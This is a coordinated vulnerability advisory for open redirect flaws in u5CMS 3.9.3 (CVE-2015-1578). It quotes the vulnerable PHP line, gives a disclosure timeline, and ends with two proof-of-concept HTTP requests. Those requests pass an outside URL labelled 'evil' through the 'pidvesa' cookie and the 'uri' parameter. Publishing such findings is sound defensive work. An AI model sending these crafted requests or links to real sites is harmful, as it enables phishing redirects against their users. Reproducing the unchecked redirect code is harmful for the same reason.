Lucene search

K
zeroscienceGjoko KrsticZSL-2015-5227
HistoryFeb 09, 2015 - 12:00 a.m.

u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities

2015-02-0900:00:00
Gjoko Krstic
zeroscience.mk
32

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.9 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

53.2%

Title: u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities
Advisory ID: ZSL-2015-5227
Type: Local/Remote
Impact: Spoofing
Risk: (2/5)
Release Date: 09.02.2015

Summary

u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Description

Input passed via the ‘uri’ GET parameter in ‘meta2.php’ script and using Cookie ‘pidvesa’ is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

Vendor

Stefan P. Minder - <http://www.yuba.ch>

Affected Version

3.9.3 and 3.9.2

Tested On

Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21

Vendor Status

[29.12.2014] Vulnerabilities discovered.
[04.02.2015] Contact with the vendor.
[04.02.2015] Vendor replies asking more details.
[05.02.2015] Sent details to the vendor.
[06.02.2015] Vendor releases version 3.9.4 to address these issues.
[09.02.2015] Coordinated public security advisory released.

PoC

u5cms_url.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] http://yuba.ch/index.php?c=u5cms&l=en
[2] <http://xforce.iss.net/xforce/xfdb/100772&gt;
[3] <http://cxsecurity.com/issue/WLB-2015020035&gt;
[4] <http://packetstormsecurity.com/files/130317&gt;
[5] <http://osvdb.org/show/osvdb/118206&gt;
[6] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1578&gt;
[7] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1578&gt;

Changelog

[09.02.2015] - Initial release
[11.02.2015] - Added reference [2], [3] and [4]
[12.02.2015] - Added reference [5], [6] and [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed via the 'uri' GET parameter in 'meta2.php' script and using
Cookie 'pidvesa' is not properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.

==============================================================================
\u5admin\pidvesa.php:
---------------------

Line 5: if ('<?php echo $_COOKIE['pidvesa']?>'!='') location.href='<?php echo $_COOKIE['pidvesa']?>'+'.php';

==============================================================================

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5227
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5227.php


29.12.2014

---


#1

This request example adds '.php' at the end to the pidvesa cookie value:

GET /u5cms/u5admin/pidvesa.php HTTP/1.1
Host: 10.0.50.3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mkmhuo3gquomkki4lurhap45o3; aclan=de; pidvesa=http://zeroscience.mk/evil/script;
Connection: keep-alive

 - To redirect to: http://zeroscience.mk/evil/script.php


--

#2

GET /u5cms/u5admin/meta2.php?uri=http://zeroscience.mk HTTP/1.1
</p></body></html>

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.9 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

53.2%

Related for ZSL-2015-5227